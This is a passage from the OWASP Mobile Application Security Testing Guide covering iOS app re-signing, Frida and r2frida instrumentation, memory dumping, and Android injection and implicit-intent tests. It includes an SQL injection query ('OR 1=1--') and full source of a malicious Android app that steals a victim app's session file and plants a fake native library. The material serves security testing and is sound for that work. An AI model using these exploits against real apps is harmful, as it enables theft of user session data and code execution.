Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
Tampering an app invalidates the main executable's code signature, so this won't run on a non-jailbroken device. You'll need to replace the provisioning profile and sign both the main executable and the files you've made include (e.g. FridaGadget.dylib
) with the certificate listed in the profile.
First, let's add our own provisioning profile to the package:
cp AwesomeRepackaging.mobileprovision Payload/UnCrackable\\ Level\\ 1.app/embedded.mobileprovision\n
Next, we need to make sure that the Bundle ID in Info.plist
matches the one specified in the profile because the codesign tool will read the Bundle ID from Info.plist
during signing; the wrong value will lead to an invalid signature.
/usr/libexec/PlistBuddy -c \"Set :CFBundleIdentifier sg.vantagepoint.repackage\" Payload/UnCrackable\\ Level\\ 1.app/Info.plist\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0092/#re-signing","title":"Re-Signing","text":"Finally, we use the codesign tool to re-sign both binaries. You need to use your own signing identity (in this example 8004380F331DCA22CC1B47FB1A805890AE41C938), which you can output by executing the command security find-identity -v
.
$ rm -rf Payload/UnCrackable\\ Level\\ 1.app/_CodeSignature\n$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 Payload/UnCrackable\\ Level\\ 1.app/FridaGadget.dylib\nPayload/UnCrackable Level 1.app/FridaGadget.dylib: replacing existing signature\n
entitlements.plist
is the file you created for your empty iOS project.
$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 --entitlements entitlements.plist Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nPayload/UnCrackable Level 1.app/UnCrackable Level 1: replacing existing signature\n
Now you should be ready to run the modified app. Deploy and run the app on the device using ios-deploy:
ios-deploy --debug --bundle Payload/UnCrackable\\ Level\\ 1.app/\n
If everything went well, the app should start in debugging mode with LLDB attached. Frida should then be able to attach to the app as well. You can verify this via the frida-ps command:
$ frida-ps -U\nPID Name\n--- ------\n499 Gadget\n
When something goes wrong (and it usually does), mismatches between the provisioning profile and code-signing header are the most likely causes. Reading the official documentation helps you understand the code-signing process. Apple's entitlement troubleshooting page is also a useful resource.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0094/","title":"Getting Loaded Classes and Methods dynamically","text":"In the Frida REPL Objective-C runtime the ObjC
command can be used to access information within the running app. Within the ObjC
command the function enumerateLoadedClasses
lists the loaded classes for a given application.
$ frida -U -f com.iOweApp\n\n[iPhone::com.iOweApp]-> ObjC.enumerateLoadedClasses()\n{\n \"/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\": [\n \"__NSBlockVariable__\",\n \"__NSGlobalBlock__\",\n \"__NSFinalizingBlock__\",\n \"__NSAutoBlock__\",\n \"__NSMallocBlock__\",\n \"__NSStackBlock__\"\n ],\n \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\": [\n \"JailbreakDetection\",\n \"CriticalLogic\",\n \"ViewController\",\n \"AppDelegate\"\n ]\n}\n
Using ObjC.classes.<classname>.$ownMethods
the methods declared in each class can be listed.
[iPhone::com.iOweApp]-> ObjC.classes.JailbreakDetection.$ownMethods\n[\n \"+ isJailbroken\"\n]\n\n[iPhone::com.iOweApp]-> ObjC.classes.CriticalLogic.$ownMethods\n[\n \"+ doSha256:\",\n \"- a:\",\n \"- AES128Operation:data:key:iv:\",\n \"- coreLogic\",\n \"- bat\",\n \"- b:\",\n \"- hexString:\"\n]\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/#frida","title":"Frida","text":"In section \"Execution Tracing\" we've used frida-trace when navigating to a website in Safari and found that the initWithURL:
method is called to initialize a new URL request object. We can look up the declaration of this method on the Apple Developer Website:
- (instancetype)initWithURL:(NSURL *)url;\n
Using this information we can write a Frida script that intercepts the initWithURL:
method and prints the URL passed to the method. The full script is below. Make sure you read the code and inline comments to understand what's going on.
import sys\nimport frida\n\n\n# JavaScript to be injected\nfrida_code = \"\"\"\n\n // Obtain a reference to the initWithURL: method of the NSURLRequest class\n var URL = ObjC.classes.NSURLRequest[\"- initWithURL:\"];\n\n // Intercept the method\n Interceptor.attach(URL.implementation, {\n onEnter: function(args) {\n // Get a handle on NSString\n var NSString = ObjC.classes.NSString;\n\n // Obtain a reference to the NSLog function, and use it to print the URL value\n // args[2] refers to the first method argument (NSURL *url)\n var NSLog = new NativeFunction(Module.findExportByName('Foundation', 'NSLog'), 'void', ['pointer', '...']);\n\n // We should always initialize an autorelease pool before interacting with Objective-C APIs\n var pool = ObjC.classes.NSAutoreleasePool.alloc().init();\n\n try {\n // Creates a JS binding given a NativePointer.\n var myNSURL = new ObjC.Object(args[2]);\n\n // Create an immutable ObjC string object from a JS string object.\n var str_url = NSString.stringWithString_(myNSURL.toString());\n\n // Call the iOS NSLog function to print the URL to the iOS device logs\n NSLog(str_url);\n\n // Use Frida's console.log to print the URL to your terminal\n console.log(str_url);\n\n } finally {\n pool.release();\n }\n }\n });\n\"\"\"\n\nprocess = frida.get_usb_device().attach(\"Safari\")\nscript = process.create_script(frida_code)\nscript.load()\n\nsys.stdin.read()\n
Start Safari on the iOS device. Run the above Python script on your connected host and open the device log (as explained in the section \"Monitoring System Logs\" from the chapter \"iOS Basic Security Testing\"). Try opening a new URL in Safari, e.g. https://github.com/OWASP/owasp-mastg; you should see Frida's output in the logs as well as in your terminal.
Of course, this example illustrates only one of the things you can do with Frida. To unlock the tool's full potential, you should learn to use its JavaScript API. The documentation section of the Frida website has a tutorial and examples for using Frida on iOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows to perform tasks such as:
As you can see, these tasks are rather supportive and/or passive, they'll help us collect data and information that will support other techniques. Therefore, they're normally used in combination with other techniques such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. First start by opening an r2frida session to the target app (e.g. iGoat-Swift) that should be running on your iPhone (connected per USB). Use the following command:
r2 frida://usb//iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-maps-and-inspection","title":"Memory Maps and Inspection","text":"You can retrieve the app's memory maps by running :dm
:
[0x00000000]> :dm\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100de0000 - 0x0000000100e68000 rw- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100e68000 - 0x0000000100e97000 r-- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n...\n0x0000000100ea8000 - 0x0000000100eb0000 rw-\n0x0000000100eb0000 - 0x0000000100eb4000 r--\n0x0000000100eb4000 - 0x0000000100eb8000 r-x /usr/lib/TweakInject.dylib\n0x0000000100eb8000 - 0x0000000100ebc000 rw- /usr/lib/TweakInject.dylib\n0x0000000100ebc000 - 0x0000000100ec0000 r-- /usr/lib/TweakInject.dylib\n0x0000000100f60000 - 0x00000001012dc000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/Frameworks/Realm.framework/Realm\n
While you're searching or exploring the app memory, you can always verify where your current offset is located in the memory map. Instead of noting and searching for the memory address in this list you can simply run :dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested into the modules (binaries and libraries) that the app has loaded, you can use the command :il
to list them all:
[0x00000000]> :il\n0x0000000100b7c000 iGoat-Swift\n0x0000000100eb4000 TweakInject.dylib\n0x00000001862c0000 SystemConfiguration\n0x00000001847c0000 libc++.1.dylib\n0x0000000185ed9000 Foundation\n0x000000018483c000 libobjc.A.dylib\n0x00000001847be000 libSystem.B.dylib\n0x0000000185b77000 CFNetwork\n0x0000000187d64000 CoreData\n0x00000001854b4000 CoreFoundation\n0x00000001861d3000 Security\n0x000000018ea1d000 UIKit\n0x0000000100f60000 Realm\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the main app binary iGoat-Swift is located at 0x0000000100b7c000
and the Realm Framework at 0x0000000100f60000
.
You can also use objection to display the same information.
$ objection --gadget OWASP.iGoat-Swift explore\n\nOWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n-------------------------------- ----------- -------------------- ------------------------------------------------------------------------------\niGoat-Swift 0x100b7c000 2506752 (2.4 MiB) /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGo...\nTweakInject.dylib 0x100eb4000 16384 (16.0 KiB) /usr/lib/TweakInject.dylib\nSystemConfiguration 0x1862c0000 446464 (436.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio...\nlibc++.1.dylib 0x1847c0000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. In this first example, you can start by searching for something that you know should be located in the main binary of the app:
[0x00000000]> \\/ iGoat\nSearching 5 bytes: 69 47 6f 61 74\nSearching 5 bytes in [0x0000000100b7c000-0x0000000100de0000]\n...\nhits: 509\n0x100d7d332 hit2_0 iGoat_Swift24StringAnalysisExerciseVCC\n0x100d7d3b2 hit2_1 iGoat_Swift28BrokenCryptographyExerciseVCC\n0x100d7d442 hit2_2 iGoat_Swift23BackgroundingExerciseVCC\n0x100d7d4b2 hit2_3 iGoat_Swift9AboutCellC\n0x100d7d522 hit2_4 iGoat_Swift12FadeAnimatorV\n
Now take the first hit, seek to it and check your current location in the memory map:
[0x00000000]> s 0x100d7d332\n[0x100d7d332]> :dm.\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n
As expected, you are located in the region of the main iGoat-Swift binary (r-x, read and execute). In the previous section, you saw that the main binary is located between 0x0000000100b7c000
and 0x0000000100e97000
.
Now, for this second example, you can search for something that's not in the app binary nor in any loaded library, typically user input. Open the iGoat-Swift app and navigate in the menu to Authentication -> Remote Authentication -> Start. There you'll find a password field that you can overwrite. Write the string \"owasp-mstg\" but do not click on Login just yet. Perform the following two steps.
[0x00000000]> \\/ owasp-mstg\nhits: 1\n0x1c06619c0 hit3_0 owasp-mstg\n
In fact, the string could be found at address 0x1c06619c0
. Seek s
to there and retrieve the current memory region with :dm.
.
[0x100d7d332]> s 0x1c06619c0\n[0x1c06619c0]> :dm.\n0x00000001c0000000 - 0x00000001c8000000 rw-\n
Now you know that the string is located in a rw- (read and write) region of the memory map.
Additionally, you can search for occurrences of the wide version of the string (/w
) and, again, check their memory regions:
This time we run the \\dm.
command for all @@
hits matching the glob hit5_*
.
[0x00000000]> /w owasp-mstg\nSearching 20 bytes: 6f 00 77 00 61 00 73 00 70 00 2d 00 6d 00 73 00 74 00 67 00\nSearching 20 bytes in [0x0000000100708000-0x000000010096c000]\n...\nhits: 2\n0x1020d1280 hit5_0 6f0077006100730070002d006d00730074006700\n0x1030c9c85 hit5_1 6f0077006100730070002d006d00730074006700\n\n[0x00000000]> \\dm.@@ hit5_*\n0x0000000102000000 - 0x0000000102100000 rw-\n0x0000000103084000 - 0x00000001030cc000 rw-\n
They are in a different rw- region. Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could continue the previous example, this time clicking on Login and searching again for occurrences of the data. Also, you may check if you still can find those strings in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-jailbroken device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section \"Dynamic Analysis on Non-Jailbroken Devices. To use these tools on a jailbroken phone, simply have frida-server installed and running.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection explore\n\niPhone on (iPhone: 10.3.1) [usb] # memory dump all /Users/foo/memory_iOS/memory\nDumping 768.0 KiB from base: 0x1ad200000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_iOS/memory\n
Alternatively you can use Fridump. First, you need the name of the app you want to dump, which you can get with frida-ps
.
$ frida-ps -U\n PID Name\n---- ------\n1026 Gadget\n
Afterwards, specify the app name in Fridump.
$ python3 fridump.py -u Gadget -s\n\nCurrent Directory: /Users/foo/PentestTools/iOS/fridump\nOutput directory is set to: /Users/foo/PentestTools/iOS/fridump/dump\nCreating directory...\nStarting Memory dump...\nProgress: [##################################################] 100.0% Complete\n\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished! Press Ctrl+C\n
When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is stored in Fridump's dump directory.
In both cases, if you open the file in radare2 you can use its search command (/
). Note that first we do a standard string search which doesn't succeed and next we search for a wide string, which successfully finds our string \"owasp-mstg\".
$ r2 memory_ios\n[0x00000000]> / owasp-mstg\nSearching 10 bytes in [0x0-0x628c000]\nhits: 0\n[0x00000000]> /w owasp-mstg\nSearching 20 bytes in [0x0-0x628c000]\nhits: 1\n0x0036f800 hit4_0 6f0077006100730070002d006d00730074006700\n
Next, we can seek to its address using s 0x0036f800
or s hit4_0
and print it using psw
(which stands for print string wide) or use px
to print its raw hexadecimal values:
[0x0036f800]> psw\nowasp-mstg\n\n[0x0036f800]> px 48\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n0x0036f800 6f00 7700 6100 7300 7000 2d00 6d00 7300 o.w.a.s.p.-.m.s.\n0x0036f810 7400 6700 0000 0000 0000 0000 0000 0000 t.g.............\n0x0036f820 0000 0000 0000 0000 0000 0000 0000 0000 ................\n
Note that in order to find this string using the strings
command you'll have to specify an encoding using the -e
flag and in this case l
for 16-bit little-endian character.
$ strings -e l memory_ios | grep owasp-mstg\nowasp-mstg\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0097/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the iGoat-Swift app, open a session with r2frida r2 frida://usb//iGoat-Swift
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos darwin\npid 2166\nuid 501\nobjc true\nruntime V8\njava false\ncylang true\npageSize 16384\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libboringssl.dylib
.
The following does a case-insensitive search (grep) for symbols including \"aes\" (~+aes
).
[0x00000000]> \\is libboringssl.dylib~+aes\n0x1863d6ed8 s EVP_aes_128_cbc\n0x1863d6ee4 s EVP_aes_192_cbc\n0x1863d6ef0 s EVP_aes_256_cbc\n0x1863d6f14 s EVP_has_aes_hardware\n0x1863d6f1c s aes_init_key\n0x1863d728c s aes_cipher\n0x0 u ccaes_cbc_decrypt_mode\n0x0 u ccaes_cbc_encrypt_mode\n...\n
Or you might prefer to look into the imports/exports. For example:
:ii iGoat-Swift
.:iE /usr/lib/libc++.1.dylib
.For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. :ii iGoat-Swift~..
(if not, for this binary, you'd get almost 5000 lines printed to your terminal).
The next thing you might want to look at are the classes:
[0x00000000]> \\ic~+passcode\nPSPasscodeField\n_UITextFieldPasscodeCutoutBackground\nUIPasscodeField\nPasscodeFieldCell\n...\n
List class fields:
[0x19687256c]> \\ic UIPasscodeField\n0x000000018eec6680 - becomeFirstResponder\n0x000000018eec5d78 - appendString:\n0x000000018eec6650 - canBecomeFirstResponder\n0x000000018eec6700 - isFirstResponder\n0x000000018eec6a60 - hitTest:forEvent:\n0x000000018eec5384 - setKeyboardType:\n0x000000018eec5c8c - setStringValue:\n0x000000018eec5c64 - stringValue\n...\n
Imagine that you are interested into 0x000000018eec5c8c - setStringValue:
. You can seek to that address with s 0x000000018eec5c8c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
[0x18eec5c8c]> pd 10\n\u256d (fcn) fcn.18eec5c8c 35\n\u2502 fcn.18eec5c8c (int32_t arg1, int32_t arg3);\n\u2502 bp: 0 (vars 0, args 0)\n\u2502 sp: 0 (vars 0, args 0)\n\u2502 rg: 2 (vars 0, args 2)\n\u2502 0x18eec5c8c f657bd not byte [rdi - 0x43] ; arg1\n\u2502 0x18eec5c8f a9f44f01a9 test eax, 0xa9014ff4\n\u2502 0x18eec5c94 fd std\n\u2502 \u256d\u2500< 0x18eec5c95 7b02 jnp 0x18eec5c99\n\u2502 \u2502 0x18eec5c97 a9fd830091 test eax, 0x910083fd\n\u2502 0x18eec5c9c f30300 add eax, dword [rax]\n\u2502 0x18eec5c9f aa stosb byte [rdi], al\n\u2502 \u256d\u2500< 0x18eec5ca0 e003 loopne 0x18eec5ca5\n\u2502 \u2502 0x18eec5ca2 02aa9b494197 add ch, byte [rdx - 0x68beb665] ; arg3\n\u2570 0x18eec5ca8 f4 hlt\n
Finally, instead of doing a full memory search for strings, you may want to retrieve the strings from a certain binary and filter them, as you'd do offline with radare2. For this you have to find the binary, seek to it and then run the :iz
command.
It's recommended to apply a filter with a keyword ~<keyword>
/~+<keyword>
to minimize the terminal output. If just want to explore all results you can also pipe them to the internal less \\iz~..
.
[0x00000000]> :il~iGoa\n0x00000001006b8000 iGoat-Swift\n[0x00000000]> s 0x00000001006b8000\n[0x1006b8000]> :iz\nReading 2.390625MB ...\nDo you want to print 8568 lines? (y/N) N\n[0x1006b8000]> :iz~+hill\nReading 2.390625MB ...\n[0x1006b8000]> :iz~+pass\nReading 2.390625MB ...\n0x00000001006b93ed \"passwordTextField\"\n0x00000001006bb11a \"11iGoat_Swift20KeychainPasswordItemV0C5ErrorO\"\n0x00000001006bb164 \"unexpectedPasswordData\"\n0x00000001006d3f62 \"Error reading password from keychain - \"\n0x00000001006d40f2 \"Incorrect Password\"\n0x00000001006d4112 \"Enter the correct password\"\n0x00000001006d4632 \"T@\"UITextField\",N,W,VpasswordField\"\n0x00000001006d46f2 \"CREATE TABLE IF NOT EXISTS creds (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT);\"\n0x00000001006d4792 \"INSERT INTO creds(username, password) VALUES(?, ?)\"\n
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0098/","title":"Patching React Native Apps","text":"If the React Native framework has been used for development, the main application code is in the file Payload/[APP].app/main.jsbundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. With the tool JStillery, a human-readable version of the file can be retried, which will allow code analysis. The CLI version of JStillery and the local server are preferable to the online version because the latter discloses the source code to a third party.
At installation time, the application archive is unpacked into the folder /private/var/containers/Bundle/Application/[GUID]/[APP].app
from iOS 10 onward, so the main JavaScript application file can be modified at this location.
To identify the exact location of the application folder, you can use the tool ipainstaller:
ipainstaller -l
to list the applications installed on the device. Get the name of the target application from the output list.ipainstaller -i [APP_NAME]
to display information about the target application, including the installation and data folder locations.Application:
.Use the following approach to patch the JavaScript file:
Payload/[APP].app/main.jsbundle
to a temporary file.JStillery
to beautify and de-obfuscate the contents of the temporary file.Payload/[APP].app/main.jsbundle
file.Make sure that the unlocked key is used during the application flow. For example, the key may be used to decrypt local storage or a message received from a remote endpoint. If the application simply checks whether the user has unlocked the key or not, the application may be vulnerable to a local authentication bypass.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0017/#dynamic-analysis","title":"Dynamic Analysis","text":"Validate the duration of time (seconds) for which the key is authorized to be used after the user is successfully authenticated. This is only needed if setUserAuthenticationRequired
is used.
Note that there are quite some vendor/third party SDKs, which provide biometric support, but which have their own insecurities. Be very cautious when using third party SDKs to handle sensitive authentication logic.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0018/#dynamic-analysis","title":"Dynamic Analysis","text":"Please take a look at this detailed blog article about the Android KeyStore and Biometric authentication. This research includes two Frida scripts which can be used to test insecure implementations of biometric authentication and try to bypass them:
CryptoObject
is not used in the authenticate
method of the BiometricPrompt
class. The authentication implementation relies on the callback onAuthenticationSucceded
being called.CryptoObject
is used, but used in an incorrect way. The detailed explanation can be found in the section \"Crypto Object Exception Handling\" in the blog post.For any publicly accessible data storage, any process can override the data. This means that input validation needs to be applied the moment the data is read back again.
Note: The same is true for private accessible data on a rooted device
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#static-analysis","title":"Static analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-shared-preferences","title":"Using Shared Preferences","text":"When you use the SharedPreferences.Editor
to read or write int/boolean/long values, you cannot check whether the data is overridden or not. However: it can hardly be used for actual attacks other than chaining the values (e.g. no additional exploits can be packed which will take over the control flow). In the case of a String
or a StringSet
you should be careful with how the data is interpreted. Using reflection based persistence? Check the section on \"Testing Object Persistence\" for Android to see how it should be validated. Using the SharedPreferences.Editor
to store and read certificates or keys? Make sure you have patched your security provider given vulnerabilities such as found in Bouncy Castle.
In all cases, having the content HMACed can help to ensure that no additions and/or changes have been applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-other-storage-mechanisms","title":"Using Other Storage Mechanisms","text":"In case other public storage mechanisms (than the SharedPreferences.Editor
) are used, the data needs to be validated the moment it is read from the storage mechanism.
To test for injection flaws you need to first rely on other tests and check for functionality that might have been exposed:
An example of a vulnerable IPC mechanism is shown below.
You can use ContentProviders to access database information, and you can probe services to see if they return data. If data is not validated properly, the content provider may be prone to SQL injection while other apps are interacting with it. See the following vulnerable implementation of a ContentProvider.
<provider\n android:name=\".OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation\"\n android:authorities=\"sg.vp.owasp_mobile.provider.College\">\n</provider>\n
The AndroidManifest.xml
above defines a content provider that's exported and therefore available to all other apps. The query
function in the OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation.java
class should be inspected.
@Override\npublic Cursor query(Uri uri, String[] projection, String selection,String[] selectionArgs, String sortOrder) {\n SQLiteQueryBuilder qb = new SQLiteQueryBuilder();\n qb.setTables(STUDENTS_TABLE_NAME);\n\n switch (uriMatcher.match(uri)) {\n case STUDENTS:\n qb.setProjectionMap(STUDENTS_PROJECTION_MAP);\n break;\n\n case STUDENT_ID:\n // SQL Injection when providing an ID\n qb.appendWhere( _ID + \"=\" + uri.getPathSegments().get(1));\n Log.e(\"appendWhere\",uri.getPathSegments().get(1).toString());\n break;\n\n default:\n throw new IllegalArgumentException(\"Unknown URI \" + uri);\n }\n\n if (sortOrder == null || sortOrder == \"\"){\n /**\n * By default sort on student names\n */\n sortOrder = NAME;\n }\n Cursor c = qb.query(db, projection, selection, selectionArgs,null, null, sortOrder);\n\n /**\n * register to watch a content URI for changes\n */\n c.setNotificationUri(getContext().getContentResolver(), uri);\n return c;\n}\n
While the user is providing a STUDENT_ID at content://sg.vp.owasp_mobile.provider.College/students
, the query statement is prone to SQL injection. Obviously prepared statements must be used to avoid SQL injection, but input validation should also be applied so that only input that the app is expecting is processed.
All app functions that process data coming in through the UI should implement input validation:
public boolean isAlphaNumeric(String s){\n String pattern= \"^[a-zA-Z0-9]*$\";\n return s.matches(pattern);\n}\n
An alternative to validation functions is type conversion, with, for example, Integer.parseInt
if only integers are expected. The OWASP Input Validation Cheat Sheet contains more information about this topic.
The tester should manually test the input fields with strings like OR 1=1--
if, for example, a local SQL injection vulnerability has been identified.
On a rooted device, the command content can be used to query the data from a content provider. The following command queries the vulnerable function described above.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students\n
SQL injection can be exploited with the following command. Instead of getting the record for Bob only, the user can retrieve all data.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students --where \"name='Bob') OR 1=1--''\"\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/","title":"Testing Implicit Intents","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#overview","title":"Overview","text":"When testing for implicit intents you need to check if they are vulnerable to injection attacks or potentially leaking sensitive data.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#static-analysis","title":"Static Analysis","text":"Inspect the Android Manifest and look for any <intent>
signatures defined inside blocks (which specify the set of other apps an app intends to interact with), check if it contains any system actions (e.g. android.intent.action.GET_CONTENT
, android.intent.action.PICK
, android.media.action.IMAGE_CAPTURE
, etc.) and browse the source code for their occurrence.
For example, the following Intent
doesn't specify any concrete component, meaning that it's an implicit intent. It sets the action android.intent.action.GET_CONTENT
to ask the user for input data and then the app starts the intent by startActivityForResult
and specifying an image chooser.
Intent intent = new Intent();\nintent.setAction(\"android.intent.action.GET_CONTENT\");\nstartActivityForResult(Intent.createChooser(intent, \"\"), REQUEST_IMAGE);\n
The app uses startActivityForResult
instead of startActivity
, indicating that it expects a result (in this case an image), so you should check how the return value of the intent is handled by looking for the onActivityResult
callback. If the return value of the intent isn't properly validated, an attacker may be able to read arbitrary files or execute arbitrary code from the app's internal `/data/data/' storage. A full description of this type of attack can be found in the following blog post."},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-1-arbitrary-file-read","title":"Case 1: Arbitrary File Read","text":"
In this example we're going to see how an attacker can read arbitrary files from within the app's internal storage /data/data/<appname>
due to the improper validation of the return value of the intent.
The performAction
method in the following example reads the implicit intents return value, which can be an attacker provided URI and hands it to getFileItemFromUri
. This method copies the file to a temp folder, which is usual if this file is displayed internally. But if the app stores the URI provided file in an external temp directory e.g by calling getExternalCacheDir
or getExternalFilesDir
an attacker can read this file if he sets the permission android.permission.READ_EXTERNAL_STORAGE
.
private void performAction(Action action){\n ...\n Uri data = intent.getData();\n if (!(data == null || (fileItemFromUri = getFileItemFromUri(data)) == null)) {\n ...\n }\n}\n\nprivate FileItem getFileItemFromUri(Context, context, Uri uri){\n String fileName = UriExtensions.getFileName(uri, context);\n File file = new File(getExternalCacheDir(), \"tmp\");\n file.createNewFile();\n copy(context.openInputStream(uri), new FileOutputStream(file));\n ...\n}\n
The following is the source of a malicious app that exploits the above vulnerable code.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n</application>\n
EvilContentActivity.java
public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"file:///data/data/<victim_app>/shared_preferences/session.xml\")));\n finish();\n }\n}\n
If the user selects the malicious app to handle the intent, the attacker can now steal the session.xml
file from the app's internal storage. In the previous example, the victim must explicitly select the attacker's malicious app in a dialog. However, developers may choose to suppress this dialog and automatically determine a recipient for the intent. This would allow the attack to occur without any additional user interaction.
The following code sample implements this automatic selection of the recipient. By specifying a priority in the malicious app's intent filter, the attacker can influence the selection sequence.
Intent intent = new Intent(\"android.intent.action.GET_CONTENT\");\nfor(ResolveInfo info : getPackageManager().queryIntentActivities(intent, 0)) {\n intent.setClassName(info.activityInfo.packageName, info.activityInfo.name);\n startActivityForResult(intent);\n return;\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-2-arbitrary-code-execution","title":"Case 2: Arbitrary Code Execution","text":"An improperly handled return value of an implicit intent can lead to arbitrary code execution if the victim app allows content://
and file://
URLs.
An attacker can implement a ContentProvider
that contains public Cursor query(...)
to set an arbitrary file (in this case lib.so), and if the victim loads this file from the content provider by executing copy
the attacker's ParcelFileDescriptor openFile(...)
method will be executed and return a malicious fakelib.so.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n <provider android:name=\".EvilContentProvider\" android:authorities=\"com.attacker.evil\" android:enabled=\"true\" android:exported=\"true\"></provider>\n</application>\n
EvilContentProvider.java
public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {\n MatrixCursor matrixCursor = new MatrixCursor(new String[]{\"_display_name\"});\n matrixCursor.addRow(new Object[]{\"../lib-main/lib.so\"});\n return matrixCursor;\n}\npublic ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {\n return ParcelFileDescriptor.open(new File(\"/data/data/com.attacker/fakelib.so\"), ParcelFileDescriptor.MODE_READ_ONLY);\n}\n
EvilContentActivity.java
